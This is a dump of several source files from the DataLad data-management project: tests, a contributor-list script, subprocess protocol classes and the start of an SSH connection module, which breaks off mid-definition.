ds.id[3:] / 'annex'))\n if not eph_clone.repo.is_managed_branch():\n # TODO: We can't properly handle adjusted branch yet\n # we don't need to get files in order to access them:\n assert_equal((eph_clone.pathobj / file_test).read_text(), \"some\")\n assert_equal((eph_clone.pathobj / file_testsub).read_text(), \"other\")\n\n # can we unlock those files?\n eph_clone.unlock(file_test)\n # change content\n (eph_clone.pathobj / file_test).write_text(\"new content\")\n eph_clone.save()\n\n # new content should already be in store\n # (except the store doesn't know yet)\n res = eph_clone.repo.fsck(remote=\"riastore-storage\", fast=True)\n assert_equal(len(res), 2)\n assert_result_count(res, 1, success=True, file=file_test.as_posix())\n assert_result_count(res, 1, success=True, file=file_testsub.as_posix())\n\n # push back git history\n eph_clone.push(to=DEFAULT_REMOTE, data=\"nothing\")\n\n # get an update in origin\n ds.update(merge=True, reobtain_data=True)\n assert_equal((ds.pathobj / file_test).read_text(), \"new content\")\n" }, { "alpha_fraction": 0.6849641799926758, "alphanum_fraction": 0.6849641799926758, "avg_line_length": 37.09090805053711, "blob_id": "50e2d210dcdf8fbdec03e517894af3afe88b7890", "content_id": "d0febed7b18a7d019da3e22be141e41f56c34bc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 419, "license_type": "permissive", "max_line_length": 77, "num_lines": 11, "path": "/tools/mkcontrib", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\necho \"The following people have contributed to DataLad:\" > CONTRIBUTORS\necho >> CONTRIBUTORS\n\n# note: some exclusions to clean up botched git author tags that got fixed in\n# later commits, hopefully we'll be more careful about this in the future\ngit log --format='%aN' | sort | uniq \\\n | grep -E -v \\\n -e 'Mr.Nobody' -e unknown -e 'DataLad Tester' -e '^blah' -e Yarchael \\\n | sort >> CONTRIBUTORS\n" }, { "alpha_fraction": 0.6110148429870605, "alphanum_fraction": 0.6127475500106812, "avg_line_length": 36.58139419555664, "blob_id": "649a8044ecd255e21df43d4b6a6802d9f8736973", "content_id": "1526d9ce970d2e190f3510d8dda329e0f1985a54", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8080, "license_type": "permissive", "max_line_length": 106, "num_lines": 215, "path": "/datalad/runner/protocol.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base class of a protocol to be used with the DataLad runner\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport subprocess\nimport warnings\nfrom collections import deque\nfrom locale import getpreferredencoding\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.utils import ensure_unicode\n\nfrom .exception import CommandError\n\nlgr = logging.getLogger('datalad.runner.protocol')\n\n\nclass GeneratorMixIn:\n \"\"\" Protocol mix in that will instruct runner.run to return a generator\n\n When this class is in the parent of a protocol given to runner.run (and\n some other functions/methods) the run-method will return a `Generator`,\n which yields whatever the protocol callbacks send to the `Generator`,\n via the `send_result`-method of this class.\n\n This allows to use runner.run() in constructs like:\n\n for result in runner.run(...):\n # do something, for example write to stdin of the subprocess\n\n \"\"\"\n def __init__(self):\n self.result_queue = deque()\n\n def send_result(self, result):\n self.result_queue.append(result)\n\n\nclass WitlessProtocol:\n \"\"\"Subprocess communication protocol base class for `run_async_cmd`\n\n This class implements basic subprocess output handling. Derived classes\n like `StdOutCapture` should be used for subprocess communication that need\n to capture and return output. In particular, the `pipe_data_received()`\n method can be overwritten to implement \"online\" processing of process\n output.\n\n This class defines a default return value setup that causes\n `run_async_cmd()` to return a 2-tuple with the subprocess's exit code\n and a list with bytestrings of all captured output streams.\n \"\"\"\n\n proc_out = False\n proc_err = False\n\n def __init__(self, done_future: Any = None, encoding: Optional[str] = None) -> None:\n \"\"\"\n Parameters\n ----------\n done_future: Any\n Ignored parameter, kept for backward compatibility (DEPRECATED)\n encoding : str\n Encoding to be used for process output bytes decoding. By default,\n the preferred system encoding is guessed.\n \"\"\"\n\n if done_future is not None:\n warnings.warn(\"`done_future` argument is ignored \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n\n self.fd_infos: dict[int, tuple[str, Optional[bytearray]]] = {}\n\n self.process: Optional[subprocess.Popen] = None\n self.stdout_fileno = 1\n self.stderr_fileno = 2\n\n # capture output in bytearrays while the process is running\n self.fd_infos[self.stdout_fileno] = (\"stdout\", bytearray()) if self.proc_out else (\"stdout\", None)\n self.fd_infos[self.stderr_fileno] = (\"stderr\", bytearray()) if self.proc_err else (\"stderr\", None)\n\n super().__init__()\n self.encoding = encoding or getpreferredencoding(do_setlocale=False)\n\n self._log_outputs = False\n if lgr.isEnabledFor(5):\n try:\n from datalad import cfg\n self._log_outputs = cfg.getbool('datalad.log', 'outputs', default=False)\n except ImportError:\n pass\n self._log = self._log_summary\n else:\n self._log = self._log_nolog\n\n def _log_nolog(self, fd: int, data: str | bytes) -> None:\n pass\n\n def _log_summary(self, fd: int, data: str | bytes) -> None:\n fd_name = self.fd_infos[fd][0]\n assert self.process is not None\n lgr.log(5, 'Read %i bytes from %i[%s]%s',\n len(data), self.process.pid, fd_name, ':' if self._log_outputs else '')\n if self._log_outputs:\n log_data = ensure_unicode(data)\n # The way we log is to stay consistent with Runner.\n # TODO: later we might just log in a single entry, without\n # fd_name prefix\n lgr.log(5, \"%s| %s \", fd_name, log_data)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n \"\"\"Called when the connection is lost or closed.\n\n The argument is an exception object or None (the latter\n meaning a regular EOF is received or the connection was\n aborted or closed).\n \"\"\"\n\n def connection_made(self, process: subprocess.Popen) -> None:\n self.process = process\n lgr.log(8, 'Process %i started', self.process.pid)\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]) -> None:\n \"\"\"Called when a file descriptor associated with the child process is\n closed.\n\n fd is the int file descriptor that was closed.\n \"\"\"\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n self._log(fd, data)\n # Store received output if stream was to be captured.\n fd_name, buffer = self.fd_infos[fd]\n if buffer is not None:\n buffer.extend(data)\n\n def timeout(self, fd: Optional[int]) -> bool:\n \"\"\"\n Called if the timeout parameter to WitlessRunner.run()\n is not `None` and a process file descriptor could not\n be read (stdout or stderr) or not be written (stdin)\n within the specified time in seconds, or if waiting for\n a subprocess to exit takes longer than the specified time.\n\n stdin timeouts are only caught when the type of the `stdin`-\n parameter to WitlessRunner.run() is either a `Queue`,\n a `str`, or `bytes`. `Stdout` or `stderr` timeouts\n are only caught of proc_out and proc_err are `True` in the\n protocol class. Process wait timeouts are\n always caught if `timeout` is not `None`. In this case the\n `fd`-argument will be `None`.\n\n fd:\n The file descriptor that timed out or `None` if no\n progress was made at all, i.e. no stdin element was\n enqueued and no output was read from either stdout\n or stderr.\n\n return:\n If the callback returns `True`, the file descriptor\n (if any was given) will be closed and no longer monitored.\n If the return values is anything else than `True`,\n the file-descriptor will be monitored further\n and additional timeouts might occur indefinitely.\n If `None` was given, i.e. a process runtime-timeout\n was detected, and `True` is returned, the process\n will be terminated.\n \"\"\"\n return False\n\n def _prepare_result(self) -> dict:\n \"\"\"Prepares the final result to be returned to the runner\n\n Note for derived classes overwriting this method:\n\n The result must be a dict with keys that do not unintentionally\n conflict with the API of CommandError, as the result dict is passed to\n this exception class as kwargs on error. The Runner will overwrite\n 'cmd' and 'cwd' on error, if they are present in the result.\n \"\"\"\n assert self.process is not None\n return_code = self.process.poll()\n if return_code is None:\n raise CommandError(\n msg=f\"Got None as a return_code for the process {self.process.pid}\")\n lgr.log(\n 8,\n 'Process %i exited with return code %i',\n self.process.pid, return_code)\n # give captured process output back to the runner as string(s)\n results: dict[str, Any] = {\n name: (\n bytes(byt).decode(self.encoding)\n if byt is not None\n else '')\n for name, byt in self.fd_infos.values()\n }\n results['code'] = return_code\n return results\n\n def process_exited(self) -> None:\n pass\n" }, { "alpha_fraction": 0.5562422871589661, "alphanum_fraction": 0.5636588335037231, "avg_line_length": 34.130435943603516, "blob_id": "e34127a117616c4b2a7d3dd5b4229a3569f8b861", "content_id": "60df60b0148b41cea6e33fa504efd5bc7c01f099", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "permissive", "max_line_length": 87, "num_lines": 23, "path": "/datalad/tests/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport shutil\nimport tempfile\nfrom logging import getLogger\n\nlgr = getLogger(\"datalad.tests\")\n\n# We will delay generation of some test files/directories until they are\n# actually used but then would remove them here\n_TEMP_PATHS_GENERATED = []\n\n# Give a custom template so we could hunt them down easily\ntempfile.template = os.path.join(tempfile.gettempdir(),\n 'tmp-page2annex')\n\n" }, { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5537340641021729, "avg_line_length": 29.5, "blob_id": "672cf65890335dc9959b1e80ebd591c1b011dbf0", "content_id": "e21d78323f2025b33d12fe55c80a2224d5448ac6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "permissive", "max_line_length": 87, "num_lines": 36, "path": "/datalad/tests/test__main__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom io import StringIO\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom .. import (\n __main__,\n __version__,\n)\n\n\n@patch('sys.stdout', new_callable=StringIO)\ndef test_main_help(stdout=None):\n assert_raises(SystemExit, __main__.main, ['__main__.py', '--help'])\n assert(\n stdout.getvalue().startswith(\n \"Usage: %s -m datalad [OPTIONS] <file> [ARGS]\\n\" % sys.executable\n ))\n\n@patch('sys.stdout', new_callable=StringIO)\ndef test_main_version(stdout=None):\n assert_raises(SystemExit, __main__.main, ['__main__.py', '--version'])\n assert_equal(stdout.getvalue().rstrip(), \"datalad %s\" % __version__)\n" }, { "alpha_fraction": 0.5277044773101807, "alphanum_fraction": 0.5343008041381836, "avg_line_length": 25.13793182373047, "blob_id": "38c60f5d2d3733b2ceef37aad4aa5970a2752075", "content_id": "7c787e200ad95aa5eb613fbcfe2963336641d4a8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distributed/tests/test_create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GitHub\"\"\"\n\n\nfrom datalad.api import create_sibling_github\nfrom datalad.tests.utils_pytest import (\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_github(path=None):\n check4real(\n create_sibling_github,\n path,\n 'github',\n 'https://api.github.com',\n 'repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.6133614182472229, "alphanum_fraction": 0.6329728960990906, "avg_line_length": 35.864864349365234, "blob_id": "387cecdd9d58041c961f766d5c7a7e99a67db821", "content_id": "791bc06351ec4083a4dd05259397d02a6c41fc9e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10912, "license_type": "permissive", "max_line_length": 116, "num_lines": 296, "path": "/datalad/customremotes/tests/test_archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for customremotes archives providing dl+archive URLs handling\"\"\"\n\nimport glob\nimport logging\nimport os\nimport os.path as op\nimport sys\nfrom time import sleep\nfrom unittest.mock import patch\n\nfrom datalad.api import Dataset\nfrom datalad.cmd import (\n GitWitlessRunner,\n KillOutput,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import CommandError\n\nfrom ...consts import ARCHIVES_SPECIAL_REMOTE\nfrom ...support.annexrepo import AnnexRepo\nfrom ...tests.test_archives import (\n fn_archive_obscure,\n fn_archive_obscure_ext,\n fn_in_archive_obscure,\n)\nfrom ...tests.utils_pytest import (\n abspath,\n assert_equal,\n assert_false,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_true,\n chpwd,\n eq_,\n in_,\n known_failure_githubci_win,\n ok_,\n serve_path_via_http,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom ...utils import unlink\nfrom ..archives import (\n ArchiveAnnexCustomRemote,\n link_file_load,\n)\n\n\n# TODO: with_tree ATM for archives creates this nested top directory\n# matching archive name, so it will be a/d/test.dat ... we don't want that probably\n@known_failure_githubci_win\n@with_tree(\n tree=(('a.tar.gz', {'d': {fn_in_archive_obscure: '123'}}),\n ('simple.txt', '123'),\n (fn_archive_obscure_ext, (('d', ((fn_in_archive_obscure, '123'),)),)),\n (fn_archive_obscure, '123')))\n@with_tempfile()\ndef test_basic_scenario(d=None, d2=None):\n fn_archive, fn_extracted = fn_archive_obscure_ext, fn_archive_obscure\n annex = AnnexRepo(d, backend='MD5E')\n annex.init_remote(\n ARCHIVES_SPECIAL_REMOTE,\n ['encryption=none', 'type=external', 'externaltype=%s' % ARCHIVES_SPECIAL_REMOTE,\n 'autoenable=true'\n ])\n assert annex.is_special_annex_remote(ARCHIVES_SPECIAL_REMOTE)\n # We want two maximally obscure names, which are also different\n assert(fn_extracted != fn_in_archive_obscure)\n annex.add(fn_archive)\n annex.commit(msg=\"Added tarball\")\n annex.add(fn_extracted)\n annex.commit(msg=\"Added the load file\")\n\n # Operations with archive remote URL\n # this is not using this class for its actual purpose\n # being a special remote implementation\n # likely all this functionality should be elsewhere\n annexcr = ArchiveAnnexCustomRemote(annex=None, path=d)\n # few quick tests for get_file_url\n\n eq_(annexcr.get_file_url(archive_key=\"xyz\", file=\"a.dat\"), \"dl+archive:xyz#path=a.dat\")\n eq_(annexcr.get_file_url(archive_key=\"xyz\", file=\"a.dat\", size=999), \"dl+archive:xyz#path=a.dat&size=999\")\n\n # see https://github.com/datalad/datalad/issues/441#issuecomment-223376906\n # old style\n eq_(annexcr._parse_url(\"dl+archive:xyz/a.dat#size=999\"), (\"xyz\", \"a.dat\", {'size': 999}))\n eq_(annexcr._parse_url(\"dl+archive:xyz/a.dat\"), (\"xyz\", \"a.dat\", {})) # old format without size\n # new style\n eq_(annexcr._parse_url(\"dl+archive:xyz#path=a.dat&size=999\"), (\"xyz\", \"a.dat\", {'size': 999}))\n eq_(annexcr._parse_url(\"dl+archive:xyz#path=a.dat\"), (\"xyz\", \"a.dat\", {})) # old format without size\n\n file_url = annexcr.get_file_url(\n archive_file=fn_archive,\n file=fn_archive.replace('.tar.gz', '') + '/d/' + fn_in_archive_obscure)\n\n annex.add_url_to_file(fn_extracted, file_url, ['--relaxed'])\n annex.drop(fn_extracted)\n\n list_of_remotes = annex.whereis(fn_extracted, output='descriptions')\n in_('[%s]' % ARCHIVES_SPECIAL_REMOTE, list_of_remotes)\n\n assert_false(annex.file_has_content(fn_extracted))\n\n with swallow_logs(new_level=logging.INFO) as cml:\n annex.get(fn_extracted)\n # Hint users to the extraction cache (and to datalad clean)\n cml.assert_logged(msg=\"datalad-archives special remote is using an \"\n \"extraction\", level=\"INFO\", regex=False)\n assert_true(annex.file_has_content(fn_extracted))\n\n annex.rm_url(fn_extracted, file_url)\n assert_raises(CommandError, annex.drop, fn_extracted)\n\n annex.add_url_to_file(fn_extracted, file_url)\n annex.drop(fn_extracted)\n annex.get(fn_extracted)\n annex.drop(fn_extracted) # so we don't get from this one next\n\n # Let's create a clone and verify chain of getting file through the tarball\n cloned_annex = AnnexRepo.clone(d, d2)\n # we still need to enable manually atm that special remote for archives\n # cloned_annex.enable_remote('annexed-archives')\n\n assert_false(cloned_annex.file_has_content(fn_archive))\n assert_false(cloned_annex.file_has_content(fn_extracted))\n cloned_annex.get(fn_extracted)\n assert_true(cloned_annex.file_has_content(fn_extracted))\n # as a result it would also fetch tarball\n assert_true(cloned_annex.file_has_content(fn_archive))\n\n # verify that we can drop if original archive gets dropped but available online:\n # -- done as part of the test_add_archive_content.py\n # verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! ;)\n\n\n@known_failure_githubci_win\n@with_tree(\n tree={'a.tar.gz': {'d': {fn_in_archive_obscure: '123'}}}\n)\ndef test_annex_get_from_subdir(topdir=None):\n ds = Dataset(topdir)\n ds.create(force=True)\n ds.save('a.tar.gz')\n ds.add_archive_content('a.tar.gz', delete=True)\n fpath = op.join(topdir, 'a', 'd', fn_in_archive_obscure)\n\n with chpwd(op.join(topdir, 'a', 'd')):\n runner = WitlessRunner()\n runner.run(\n ['git', 'annex', 'drop', '--', fn_in_archive_obscure],\n protocol=KillOutput) # run git annex drop\n assert_false(ds.repo.file_has_content(fpath)) # and verify if file deleted from directory\n runner.run(\n ['git', 'annex', 'get', '--', fn_in_archive_obscure],\n protocol=KillOutput) # run git annex get\n assert_true(ds.repo.file_has_content(fpath)) # and verify if file got into directory\n\n\ndef test_get_git_environ_adjusted():\n gitrunner = GitWitlessRunner()\n env = {\"GIT_DIR\": \"../../.git\", \"GIT_WORK_TREE\": \"../../\", \"TEST_VAR\": \"Exists\"}\n\n # test conversion of relevant env vars from relative_path to correct absolute_path\n adj_env = gitrunner.get_git_environ_adjusted(env)\n assert_equal(adj_env[\"GIT_DIR\"], abspath(env[\"GIT_DIR\"]))\n assert_equal(adj_env[\"GIT_WORK_TREE\"], abspath(env[\"GIT_WORK_TREE\"]))\n\n # test if other environment variables passed to function returned unaltered\n assert_equal(adj_env[\"TEST_VAR\"], env[\"TEST_VAR\"])\n\n # test import of sys_env if no environment passed to function\n with patch.dict('os.environ', {'BOGUS': '123'}):\n sys_env = gitrunner.get_git_environ_adjusted()\n assert_equal(sys_env[\"BOGUS\"], \"123\")\n\n\ndef test_no_rdflib_loaded():\n # rely on rdflib polluting stdout to see that it is not loaded whenever we load this remote\n # since that adds 300ms delay for no immediate use\n runner = WitlessRunner()\n out = runner.run(\n [sys.executable,\n '-c',\n 'import datalad.customremotes.archives, sys; '\n 'print([k for k in sys.modules if k.startswith(\"rdflib\")])'],\n protocol=StdOutErrCapture)\n # print cmo.out\n assert_not_in(\"rdflib\", out['stdout'])\n assert_not_in(\"rdflib\", out['stderr'])\n\n\n@with_tree(tree=\n {'1.tar.gz':\n {\n 'bu.dat': '52055957098986598349795121365535' * 10000,\n 'bu3.dat': '8236397048205454767887168342849275422' * 10000\n },\n '2.tar.gz':\n {\n 'bu2.dat': '17470674346319559612580175475351973007892815102' * 10000\n },\n }\n)\n@serve_path_via_http()\n@with_tempfile\ndef check_observe_tqdm(topdir=None, topurl=None, outdir=None):\n # just a helper to enable/use when want quickly to get some\n # repository with archives and observe tqdm\n from datalad.api import (\n add_archive_content,\n create,\n )\n ds = create(outdir)\n for f in '1.tar.gz', '2.tar.gz':\n with chpwd(outdir):\n ds.repo.add_url_to_file(f, topurl + f)\n ds.save(f)\n add_archive_content(f, delete=True, drop_after=True)\n files = glob.glob(op.join(outdir, '*'))\n ds.drop(files) # will not drop tarballs\n ds.repo.drop([], options=['--all', '--fast'])\n ds.get(files)\n ds.repo.drop([], options=['--all', '--fast'])\n # now loop so we could play with it outside\n print(outdir)\n # import pdb; pdb.set_trace()\n while True:\n sleep(0.1)\n\n\n@known_failure_githubci_win\n@with_tempfile\ndef test_link_file_load(tempfile=None):\n tempfile2 = tempfile + '_'\n\n with open(tempfile, 'w') as f:\n f.write(\"LOAD\")\n\n link_file_load(tempfile, tempfile2) # this should work in general\n\n ok_(os.path.exists(tempfile2))\n\n with open(tempfile2, 'r') as f:\n assert_equal(f.read(), \"LOAD\")\n\n def inode(fname):\n with open(fname) as fd:\n return os.fstat(fd.fileno()).st_ino\n\n def stats(fname, times=True):\n \"\"\"Return stats on the file which should have been preserved\"\"\"\n with open(fname) as fd:\n st = os.fstat(fd.fileno())\n stats = (st.st_mode, st.st_uid, st.st_gid, st.st_size)\n if times:\n return stats + (st.st_atime, st.st_mtime)\n else:\n return stats\n # despite copystat mtime is not copied. TODO\n # st.st_mtime)\n\n # TODO: fix up the test to not rely on OS assumptions but rather\n # first sense filesystem about linking support.\n # For Yarik's Windows 10 VM test was failing under assumption that\n # linking is not supported at all, but I guess it does.\n if True: # on_linux or on_osx:\n # above call should result in the hardlink\n assert_equal(inode(tempfile), inode(tempfile2))\n assert_equal(stats(tempfile), stats(tempfile2))\n\n # and if we mock absence of .link\n def raise_AttributeError(*args):\n raise AttributeError(\"TEST\")\n\n with patch('os.link', raise_AttributeError):\n with swallow_logs(logging.WARNING) as cm:\n link_file_load(tempfile, tempfile2) # should still work\n ok_(\"failed (TEST), copying file\" in cm.out)\n\n # should be a copy (after mocked call)\n assert_not_equal(inode(tempfile), inode(tempfile2))\n with open(tempfile2, 'r') as f:\n assert_equal(f.read(), \"LOAD\")\n assert_equal(stats(tempfile, times=False), stats(tempfile2, times=False))\n unlink(tempfile2) # TODO: next two with_tempfile\n" }, { "alpha_fraction": 0.5832383036613464, "alphanum_fraction": 0.5857414603233337, "avg_line_length": 35.78321838378906, "blob_id": "c56010eb455dfd623a4063161fdd2f24a672d7c1", "content_id": "fe6847fec38950f1cb38d2888f9b62619130f5db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31560, "license_type": "permissive", "max_line_length": 105, "num_lines": 858, "path": "/datalad/support/sshconnector.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to an ssh connection.\n\nAllows for connecting via ssh and keeping the connection open\n(by using a controlmaster), in order to perform several ssh commands or\ngit calls to a ssh remote without the need to reauthenticate.\n\"\"\"\n\nimport fasteners\nimport os\nimport logging\nfrom socket import gethostname\nfrom hashlib import md5\nfrom subprocess import Popen\nimport tempfile\nimport threading\n\n\n# importing the quote function here so it can always be imported from this\n# module\n# this used to be shlex.quote(), but is now a cross-platform helper\nfrom datalad.utils import quote_cmdlinearg as sh_quote\n\n# !!! Do not import network here -- delay import, allows to shave off 50ms or so\n# on initial import datalad time\n# from datalad.support.network import RI, is_ssh\n\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n ConnectionOpenFailedError,\n)\nfrom datalad.support.external_versions import (\n external_versions,\n)\nfrom datalad.utils import (\n auto_repr,\n Path,\n ensure_list,\n on_windows,\n)\nfrom datalad.cmd import (\n NoCapture,\n StdOutErrCapture,\n WitlessRunner,\n)\n\nlgr = logging.getLogger('datalad.support.sshconnector')\n\n\ndef get_connection_hash(hostname, port='', username='', identity_file='',\n bundled=None, force_ip=False):\n \"\"\"Generate a hash based on SSH connection properties\n\n This can be used for generating filenames that are unique\n to a connection from and to a particular machine (with\n port and login username). The hash also contains the local\n host name.\n\n Identity file corresponds to a file that will be passed via ssh's -i\n option.\n\n All parameters correspond to the respective properties of an SSH\n connection, except for `bundled`, which is unused.\n\n .. deprecated:: 0.16\n The ``bundled`` argument is ignored.\n \"\"\"\n if bundled is not None:\n import warnings\n warnings.warn(\n \"The `bundled` argument of `get_connection_hash()` is ignored. \"\n \"It will be removed in a future release.\",\n DeprecationWarning)\n # returning only first 8 characters to minimize our chance\n # of hitting a limit on the max path length for the Unix socket.\n # Collisions would be very unlikely even if we used less than 8.\n # References:\n # https://github.com/ansible/ansible/issues/11536#issuecomment-153030743\n # https://github.com/datalad/datalad/pull/1377\n\n # The \"# nosec\" below skips insecure hash checks by 'codeclimate'. The hash\n # is not security critical, since it is only used as an \"abbreviation\" of\n # the unique connection property string.\n return md5( # nosec\n '{lhost}{rhost}{port}{identity_file}{username}{force_ip}'.format(\n lhost=gethostname(),\n rhost=hostname,\n port=port,\n identity_file=identity_file,\n username=username,\n force_ip=force_ip or ''\n ).encode('utf-8')).hexdigest()[:8]\n\n\n@auto_repr\nclass BaseSSHConnection(object):\n \"\"\"Representation of an SSH connection.\n \"\"\"\n def __init__(self, sshri, identity_file=None,\n use_remote_annex_bundle=None, force_ip=False):\n \"\"\"Create a connection handler\n\n The actual opening of the connection is performed on-demand.\n\n Parameters\n ----------\n sshri: SSHRI\n SSH resource identifier (contains all connection-relevant info),\n or another resource identifier that can be converted into an SSHRI.\n identity_file : str or None\n Value to pass to ssh's -i option.\n use_remote_annex_bundle : bool, optional\n If enabled, look for a git-annex installation on the remote and\n prefer its Git binaries in the search path (i.e. prefer a bundled\n Git over a system package). See also the configuration setting\n datalad.ssh.try-use-annex-bundled-git\n force_ip : {False, 4, 6}\n Force the use of IPv4 or IPv6 addresses with -4 or -6.\n\n .. versionchanged:: 0.16\n The default for `use_remote_annex_bundle` changed from `True`\n to `None`. Instead of attempting to use a potentially available\n git-annex bundle on the remote host by default, this behavior\n is now conditional on the `datalad.ssh.try-use-annex-bundled-git`\n (off by default).\n \"\"\"\n self._runner = None\n self._ssh_executable = None\n self._ssh_version = None\n\n from datalad.support.network import SSHRI, is_ssh\n if not is_ssh(sshri):\n raise ValueError(\n \"Non-SSH resource identifiers are not supported for SSH \"\n \"connections: {}\".format(sshri))\n self.sshri = SSHRI(**{k: v for k, v in sshri.fields.items()\n if k in ('username', 'hostname', 'port')})\n # arguments only used for opening a connection\n self._ssh_open_args = []\n # arguments for annex ssh invocation\n self._ssh_args = []\n self._ssh_open_args.extend(\n ['-p', '{}'.format(self.sshri.port)] if self.sshri.port else [])\n if force_ip:\n self._ssh_open_args.append(\"-{}\".format(force_ip))\n if identity_file:\n self._ssh_open_args.extend([\"-i\", identity_file])\n\n self._use_remote_annex_bundle = use_remote_annex_bundle\n # essential properties of the remote system\n self._remote_props = {}\n\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n \"\"\"Executes a command on the remote.\n\n It is the callers responsibility to properly quote commands\n for remote execution (e.g. filename with spaces of other special\n characters).\n\n Parameters\n ----------\n cmd: str\n command to run on the remote\n options : list of str, optional\n Additional options to pass to the `-o` flag of `ssh`. Note: Many\n (probably most) of the available configuration options should not be\n set here because they can critically change the properties of the\n connection. This exists to allow options like SendEnv to be set.\n log_output: bool\n Whether to capture and return stdout+stderr.\n\n Returns\n -------\n tuple of str\n stdout, stderr of the command run, if `log_output` was `True`\n \"\"\"\n raise NotImplementedError\n\n def open(self):\n \"\"\"Opens the connection.\n\n Returns\n -------\n bool\n To return True if connection establishes a control socket successfully.\n Return False otherwise\n \"\"\"\n\n raise NotImplementedError\n\n def close(self):\n \"\"\"Closes the connection.\n \"\"\"\n\n raise NotImplementedError\n\n @property\n def ssh_executable(self):\n \"\"\"determine which ssh client executable should be used.\n \"\"\"\n if not self._ssh_executable:\n from datalad import cfg\n self._ssh_executable = cfg.obtain(\"datalad.ssh.executable\")\n return self._ssh_executable\n\n @property\n def runner(self):\n if self._runner is None:\n self._runner = WitlessRunner()\n return self._runner\n\n @property\n def ssh_version(self):\n if self._ssh_version is None:\n ssh_version = external_versions[\"cmd:ssh\"]\n self._ssh_version = ssh_version.version if ssh_version else None\n return self._ssh_version\n\n def _adjust_cmd_for_bundle_execution(self, cmd):\n from datalad import cfg\n # locate annex and set the bundled vs. system Git machinery in motion\n if self._use_remote_annex_bundle \\\n or cfg.obtain('datalad.ssh.try-use-annex-bundled-git'):\n remote_annex_installdir = self.get_annex_installdir()\n if remote_annex_installdir:\n # make sure to use the bundled git version if any exists\n cmd = '{}; {}'.format(\n 'export \"PATH={}:$PATH\"'.format(remote_annex_installdir),\n cmd)\n return cmd\n\n def _exec_ssh(self, ssh_cmd, cmd, options=None, 